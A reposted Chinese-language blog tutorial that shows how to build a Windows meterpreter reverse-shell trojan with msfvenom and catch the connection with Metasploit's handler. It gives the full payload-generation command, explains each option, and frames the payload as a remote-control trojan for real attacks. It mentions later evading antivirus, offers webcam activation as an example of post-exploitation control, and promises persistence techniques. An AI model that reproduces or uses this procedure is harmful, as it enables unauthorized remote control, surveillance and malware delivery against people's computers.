kalilinux - msf后门木马植入与远程监听
在真实的攻击中,对方不一定是win7有永恒之蓝漏洞的版本。
所以在真实的攻击中我们要生成远控木马。
本节我们要讲的是
如何用msfvenom生成远控木马
msfvenom是用来生成后门的软件,在目标机上执行后门,在本地监听其上线。
以下我讲一个具体的windows可执行程序后门例子:
我的命令是:
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.x.xxx lport=9999 -f exe -o demo9999
其中-p是payload的意思,后面的windows是系统,x64是架构,meterpreter是作用,reverse_tcp是方式。他们组合起来是pyload_name
lhost是listenhost,这里用的ip是你kali的ip,lport是监听端口。
-f是格式输出format output,exe为windows的可执行文件,-o就是输出,输出demo.exe文件。
可以看到demo.exe就输出在桌面了。
但是肯定不会那么顺利,毕竟因为对面电脑可能有杀毒软件查杀。这就得用一点手段了~以后会讲。
今天我就拿我自己的windows当作鱼儿。把生成的exe文件拖到windows
回到keli,我们要使用handler这个模块
这里的配置要与木马的配置保持一致。
然后运行run
此时只要等待目标机点击那个exe文件即可。但是一般都会被windows拦截。
你的windows在保护你!
如果对方能成功运行那个exe的话,则你的kali会立刻监听到目标机上线。并进入后渗透meterpreter,此时你就可以对目标机做你想做的操作了
(里面的ip都是例子)
例如打开摄像头
在更真实的情况下,如果对方发现你的病毒运行程序,把它删了。那你的木马就没有用了,因为你重新搞个一模一样的exe文件到目标机,甚至禁止用户使用该文件。
那怎么办呢?
这就要用到权限维持。
下篇文章接着讲
原文地址:https://blog.csdn.net/weixin_74923758/article/details/145126090
免责声明:本站文章内容转载自网络资源,如本站内容侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!